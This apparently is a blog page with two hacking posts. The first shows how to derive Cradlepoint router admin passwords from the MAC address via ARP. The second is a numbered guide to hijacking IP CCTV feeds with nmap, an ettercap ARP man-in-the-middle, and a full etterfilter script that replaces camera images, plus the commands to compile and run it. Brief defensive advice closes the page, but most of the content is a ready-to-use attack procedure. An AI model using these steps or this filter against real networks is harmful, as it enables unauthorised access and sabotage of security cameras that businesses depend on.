Hacking Cradle Point Routers

Hacking Cradle Point Routers

This post not related with Video  Surveillance security. Please do not do hack any routers. One of my Long distance friend ask me about the same, so i will put it on my blog.

Cradle-point wireless routers are used heavily for setting small networks. However, Cradle-point uses interesting MAC specific authentication credentials which are unique for every router because of the MAC address uniqueness. In general, Cradle-point opts this behavior in order to provide more entropy in the authentication scheme rather depending on default password mechanism, which most of the LAN/WLAN router uses.

Cradle-point uses last six characters of MAC address for authentication by default. Well, in general it seems interesting because it looks like things are more secure. However, this is not appropriate from security point of view. For administrative logins and user authentication for the first time, a login page is displayed that looks for internet access password. 

The question is; How to get the password for unmanaged routers? Well, it is in MAC address. However, the obscure part is, once you are inside a WLAN , you are already having an IP address. It means Address Resolution Protocol (ARP) is the key that maps the network layer address (IP) to the link layer(Ethernet/MAC). The login page looks like as follows.

The designers made a mistake in setting this type of layout because in order to get the administrative webpage, the client has to connect to the network if it is active. Right!. Yes it is. Once a user activates the wireless connection it gets connected to the same WLAN which has a gateway address of 192.168.0.1 (default for Cradle-point routers). It is hilarious but it is trivial to subvert the stuff to get the password. Now, the hacker is in the network, so we can get possible ARP entry which resolute the IP address to the MAC address (simply ping the gateway) for the router.

As per the documentation, the password has to be 071640. Let’s try
So

Configure your devices in a secure manner.

Manipulating IP based CCTV Systems

Manipulating IP based CCTV Systems.

As you are probably aware, CCTV networks provide security to businesses around the world. However due to unsecure networks and poorly designed networks, network security cameras can be abused and there video streams redirected or modified. I am going to explain how this can be done, so you can check your network.

1. Connect to the network using wireless or penetrate a machine on lan.
2. Upload nmap and ettercap onto your machine or the machine on lan that you penetrated.
3. Scan the internal network using nmap and look for open ports in this example we will look for cameras.
4. once you find a camera run ettercap and scan the machines and perform mitm.
5. Watch the traffic and look for the ip of the cameras by sniffing the traffic coming through your machine.
6. Look at the tcp.dst and tcp.src of the packets this will tell you the source and destnation packets.
7. Once you find a suitable camera and the client that is watching create an etterfilter, One is provided below

#Example etterfilter
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, “Accept-Encoding”)) {
replace(“Accept-Encoding”, “Accept-Rubbish!”);
# note: replacement string is same length as original string
msg(“zapped Accept-Encoding!\n”);
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace(“img src=”CAMERA PICURE URL HERE”, “img src=”YOUR IMAGE HERE WITH URL HERE” “);
replace(“IMG SRC=”CAMERA PICURE URL HERE”, “img src=”YOUR IMAGE HERE WITH URL HERE” “);
msg(“Filter Ran.\n”);
}

8. Save the file as a filter for example camera.filter
9. Compile that source using ‘etterfilter camera.filter -o camera.ef’
10. Now setup ettercap to use the filter each time the page is viewed across the network ‘ettercap -T -q -F camera.ef -M ARP // //’
11. Now in theory each time the camera is viewed by someone on the network they will see your camera image not the stream.

This attack has been used, and can be devastating to any business that depends on network cameras for security. Some businesses connect network cameras directly to the gateway router, if the gateway is penetrated then this places the cameras at risk.

Wireless networks also can provide attackers with a direct connection to your network once the encryption has been broken. Wireless networks with weak encryption and a lack of network monitoring can aid an attacker in becoming undetected on the network.

I recommend that you install either a hardware firewall that detects spoofing attacks inbetween the network cameras and router/switch, and use network encryption, this should provide a very difficult environment for an attacker.